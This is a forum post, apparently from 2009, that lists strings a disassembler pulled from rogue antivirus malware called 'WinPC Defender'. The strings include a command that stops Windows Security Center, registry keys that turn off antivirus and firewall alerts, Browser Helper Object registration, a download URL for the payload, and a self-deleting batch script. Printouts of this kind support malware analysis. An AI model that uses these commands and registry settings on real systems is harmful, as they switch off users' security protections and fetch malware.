Ultra String Reference Plugin
Address Disassembly Text String
0040823B mov edx, 0040834C gg
004083A2 mov edx, 00408444 yy
004083B1 mov edx, 00408450 yyyy
004087D0 mov edx, 00408BE8 AM/PM
004087E5 mov edx, 00408BF0 A/PAMPM
004087FA mov edx, 00408BF4 AMPM
0040893C mov edx, 00408BE8 AM/PM
00408979 mov edx, 00408BF0 A/PAMPM
004089B6 mov edx, 00408BF4 AMPM
004089FF mov edx, 00408BFC AAAA
00408A46 mov edx, 00408C04 osoft\Security Center\AntiVirusDisableNotify
00408A46 mov edx, 00408C04 AAA
00408ADE mov eax, 00408C08
00408C3B mov eax, 00408C64 C
00408FDD mov eax, 00409270 e
004092A8 mov ecx, 00409464 AM
004092D1 mov ecx, 00409470 PM
004093C2 mov ecx, 00409464 AM
004093EB mov ecx, 00409470 PM
00409859 mov ecx, 004098E8 1
00409920 mov ecx, 00409ACC 1
004099E7 mov edx, 00409AD0 gg
00409A00 mov edx, 00409ADC gggyyyy
00409A0D mov edx, 00409AE0 yyyy
00409A26 mov edx, 00409AF0 eeee
00409A35 mov edx, 00409AF8 yy
00409A4E mov edx, 00409B04 ee
00409A69 mov edx, 00409B10 e
00409BED mov edi, 00409CA4 .
00409D10 push 00409D6C \r\n
0040AD10 mov ecx, 0040AF90 0
0040AD34 mov ecx, 0040AF90 0
0040AD7E mov ecx, 0040AF90 0
0040ADB5 mov ecx, 0040AF9C m/d/yy
0040ADE2 mov ecx, 0040AFAC mmmm d, yyyy
0040AE22 mov ecx, 0040AFC4 am
0040AE44 mov ecx, 0040AFD0 pm
0040AE76 mov ecx, 0040AF90 0
0040AE98 mov edx, 0040AFDC h
0040AEA7 mov edx, 0040AFE8 hh
0040AEB5 mov ecx, 0040AF90 0
0040AED8 mov ecx, 0040AF90 0
0040AEFA mov edx, 0040AFF4 AMPM
0040AF09 mov edx, 0040B004 AMPM
0040AF36 push 0040B020 :mm:ss
0040B049 push 0040B080 kernel32.dll
0040B3B5 mov eax, 00415260 <b@
0040B3DF mov eax, 00415160 0
0040B3DF mov eax, 00415160 -1
0040B3F4 mov eax, 00415158 $
0040B3F4 mov eax, 00415158 Xi@
0040B528 mov eax, 0040B1A0 (
0040B53B mov eax, 00415158 $
0040B53B mov eax, 00415158 Xi@
0040B540 mov edx, 0040B580 0x
0040BA38 push 0040BC2C oleaut32.dll
0040BA4B mov eax, 0040BC3C VariantChangeTypeExVarNeg
0040BA61 mov eax, 0040BC50 VarNeg
0040BA77 mov eax, 0040BC58 VarNot
0040BA8D mov eax, 0040BC60 VarAdd
0040BAA3 mov eax, 0040BC68 VarSub
0040BAB9 mov eax, 0040BC70 VarMul
0040BACF mov eax, 0040BC78 VarDiv
0040BAE5 mov eax, 0040BC80 VarIdivVarMod
0040BAFB mov eax, 0040BC88 VarMod
0040BB11 mov eax, 0040BC90 VarAnd
0040BB27 mov eax, 0040BC98 VarOr
0040BB3D mov eax, 0040BCA0 VarXor
0040BB53 mov eax, 0040BCA8 VarCmp
0040BB69 mov eax, 0040BCB0 VarI4FromStr
0040BB7F mov eax, 0040BCC0 VarR4FromStr
0040BB95 mov eax, 0040BCD0 VarR8FromStr
0040BBAB mov eax, 0040BCE0 VarDateFromStr
0040BBC1 mov eax, 0040BCF0 VarCyFromStr
0040BBD7 mov eax, 0040BD00 VarBoolFromStr
0040BBED mov eax, 0040BD10 VarBstrFromCy
0040CE78 mov ecx, 0040CE04 璇
00411146 mov edx, 00411230 String
004111E4 mov edx, 0041124C Array
004111F7 mov edx, 0041125C ByRef
00411640 mov eax, 00415330 Empty
00411640 mov eax, 00415330 Null
00411640 mov eax, 00415330 Smallint
00411640 mov eax, 00415330 Integer
00411640 mov eax, 00415330 Single
00411640 mov eax, 00415330 Double
00411640 mov eax, 00415330 Currency
00411640 mov eax, 00415330 Date
00411B15 push 00411B88 ole32.dll
00411B25 push 00411B94 CoCreateInstanceEx
00411B35 push 00411BA8 CoInitializeEx
00411B45 push 00411BB8 CoAddRefServerProcess
00411B55 push 00411BD0 CoReleaseServerProcess
00411B65 push 00411BE8 CoResumeClassObjects
00411B75 push 00411C00 CoSuspendClassObjects
00412ACF mov edx, 00413800 \ieocx.dll
00412E71 push 00417278 j7
00412EF1 push 004176D8 dDecrement
00412F11 push 004177F0 RegQueryValueExW
00412F31 push 00417908 har_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z
00412F61 push 00417AAC erDllUnregisterServercallocfreemallocrealloc
00413111 push 00418970 H}
00413121 push 004189FC LIB
00413141 push 00418B14 le
00413151 push 00418BA0 ght
00413161 push 00418C2C lFilename
00413171 push 00418CB8 roductVersion
00413181 push 00418D44 on
00413191 push 00418DD0 Explorer\r\n {\r\n 'Browser Helper Objects'\r\n {\r\n ForceRemove {06ec6572-7280-485a-a712-c380526bc048}\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\tval 'NoExplorer' = d '1'\r\n\t\t\t\t\t
004131A1 push 00418E5C {06ec6572-7280-485a-a712-c380526bc048}\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\tval 'NoExplorer' = d '1'\r\n\t\t\t\t\t }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nHKCR\r\n{\r\n\tIEocxApp.IEocx.1 = s
004131B1 push 00418EE8 }\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nHKCR\r\n{\r\n\tIEocxApp.IEocx.1 = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a-a712-c380526bc048}'\r\n\t}\r\n\tIEocxApp.IEocx = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a
004131C1 push 00418F74 \r\n\t}\r\n\tIEocxApp.IEocx = s 'IEocx Class'\r\n\t{\r\n\t\tCLSID = s '{06ec6572-7280-485a-a712-c380526bc048}'\r\n\t\tCurVer = s 'IEocxApp.IEocx.1'\r\n\t}\r\n\tNoRemove CLSID\r\n\t{\r\n\t\tForceRemove {06ec6572-7280-485a-a712-c380526bc048} = s 'IEocx Class
004131D1 push 00419000 emove CLSID\r\n\t{\r\n\t\tForceRemove {06ec6572-7280-485a-a712-c380526bc048} = s 'IEocx Class'\r\n\t\t{\r\n\t\t\tProgID = s 'IEocxApp.IEocx.1'\r\n\t\t\tVersionIndependentProgID = s 'IEocxApp.IEocx'\r\n\t\t\tForceRemove 'Programmable'\r\n\t\t\tInprocServer3
004131E1 push 0041908C dependentProgID = s 'IEocxApp.IEocx'\r\n\t\t\tForceRemove 'Programmable'\r\n\t\t\tInprocServer32 = s '%MODULE%'\r\n\t\t\t{\r\n\t\t\t\tval ThreadingModel = s 'Apartment'\r\n\t\t\t}\r\n\t\t\t'TypeLib' = s '{b360243e-09e8-402f-8721-00b6798089ad}'\r\n\t\t}\r\n
004131F1 push 00419118 rtment'\r\n\t\t\t}\r\n\t\t\t'TypeLib' = s '{b360243e-09e8-402f-8721-00b6798089ad}'\r\n\t\t}\r\n\t}\r\n}\r\n
00413441 push 0041A554 "
004134F1 push 0041AB58 d
004136A1 push 0041BA1C leteAce
00413737 push 00413814 \system32\regsvr32.exe /s
00413758 push 00413800 \ieocx.dll
004137A6 mov edx, 00413838 \system32\net.exe stop "Security Center"
0041389F push 004139B0 Windows_Updates
004138AE push 004139D0 http://winpcdown99.com/pcdef.exe
00413BAD mov ecx, 00413D40 \asd.bat
00413BF8 push 00413D64 del "
00413C10 push 00413D74 "
00413C40 push 00413D80 if exist "
00413C58 push 00413D94 " goto Repeat
00413C88 push 00413D64 del "
00413C93 push 00413DAC \asd.bat"
00413CE9 mov ecx, 00413D40 \asd.bat
00413EA3 mov ecx, 004140C4 No
00413EA8 mov edx, 004140D0 Control Panel\don't load\scui.cpl
00413EB7 mov ecx, 004140C4 No
00413EBC mov edx, 004140FC Control Panel\don't load\wscui.cpl
00413ECB mov ecx, 00414128 1
00413ED0 mov edx, 00414134 SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify
00413EDF mov ecx, 00414128 1
00413EF3 mov ecx, 00414128 1
00413EF8 mov edx, 004141B8 SOFTWARE\Microsoft\Security Center\FirewallDisableNotify
00413F11 mov ecx, 004141FC 0
00413F16 mov edx, 00414208 Software\WinPC Defender\Minimize
00413F25 mov ecx, 00414128 1
00413F2A mov edx, 00414234 Software\WinPC Defender\Start
00413F39 mov ecx, 00414128 1
00413F3E mov edx, 0041425C Software\WinPC Defender\Scan
00413F53 mov edx, 00414284 Software\WinPC Defender\id
00413F62 mov ecx, 004142A8 31-03-2009
00413F67 mov edx, 004142BC Software\WinPC Defender\UpdateDate
00413F76 mov ecx, 00414128 1
00413F7B mov edx, 004142E8 Software\WinPC Defender\fstart
00413F8A mov ecx, 00414310 http://billingpayment.net/pp/?id=
00413F8F mov edx, 0041433C Software\WinPC Defender\site
00413FBB mov ecx, 00414374 \pcdefender.exe
00413FE4 mov ecx, 00414374 \pcdefender.exe
0041405E mov ecx, 00414374 \pcdefender.exe |
发表于 2009-4-7 21:26:44
I don't want to Scan
发表于 2009-4-7 21:28:19
发表于 2009-4-7 21:33:04
